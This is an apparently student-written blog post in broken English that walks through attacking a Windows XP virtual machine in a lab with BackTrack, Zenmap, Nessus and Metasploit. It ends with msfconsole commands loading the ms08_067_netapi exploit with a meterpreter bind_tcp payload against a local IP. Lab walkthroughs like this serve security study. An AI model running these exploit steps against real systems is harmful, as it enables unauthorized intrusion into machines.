Jumat, 27 Januari 2012

EXPLOTATION WINDOWS XP USING METASPLOIT

First we do is open your next click startvirtualbox, but must first pay attention to the commands diwindows xp.
This command to using
1. Open VirtualBox
2. Blok Windows Xp and the next klik Start
    after you click start to emerge image around likethis.
3. The next clik start and seleck  Cmd, after that write "ipconfig" for to conection. after you   
    click start to emerge image around likethis.
4. after typing the command "ipconfig" will appearbelow the image if successful and are then     
    typing the command ping by IP 192,168.43.1Ip isdidiambil from ipconfig and eventually   
    replacedwith the number 1.
5. The next open terminal Backtrack and write ping 192.168.43.128. This Ip  is taken from 
    windows xp.
after the connection was successful then we seekinfomati directly on windowsmuch cansigunakan to find out the windowsEg can use(nmap, zenmap, and outoscan), but I mengunaknzenmap to know that there diwondows info.
This command to using
1. Open Apps in Backtrack
2. information Gathering
3. Network Analysis
4. Network Scanner
5. Clik Zenmap
    examples like this picture after we open the command zenmab.
6. The next write in target Ip 192.168.43.128. The results are as shown below when itdimemasukkan target IP.


after we get our information and systems serveselansutnya we find the gap.
1. write /etc/init.d/nessusd start to run nessus
2. Open localhost:8834
    if brewed the way we live successfully nessusscan click then click add and enter your 
    name and the target that you want to go.


3. lacn next scan will appear asgamber image below.
4. The next clik repots will appear asgamber image below
5. clik IP 192.168.43.128, the next appears many ports etc..
    I choise udp and apperas network time protokol (NTP)


Synopsis: An NTP server is listening on the remote host.

Description
An NTP (Network Time Protocol) server is listening on this port.  It
provides information about the current date and time of the remote
system and may provide system information.

Solution
n/a

Risk Factor: None

Plugin Publication Date: 2002/03/13

Plugin Last Modification Date: 2011/03/11


next we find with metasploit.
commands that do dimetasploit are as follows:
1.root@bt:~# msfconsole
2. msf > use windows/smb/ms08_067_netapi
3. set payload windows/meterpreter/bind_tcp
4. set rhose 192.168.43.128
5. exploit
These few examples of the image if it is run inmetasploit.



GOOD LUCK FOR MY FRENDS

2 komentar:

  1. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  2. Why don't you exploit the system?
    Please try a little harder, a lot of your friends can exploit it. I'm waiting for your task to exploit it.

    BalasHapus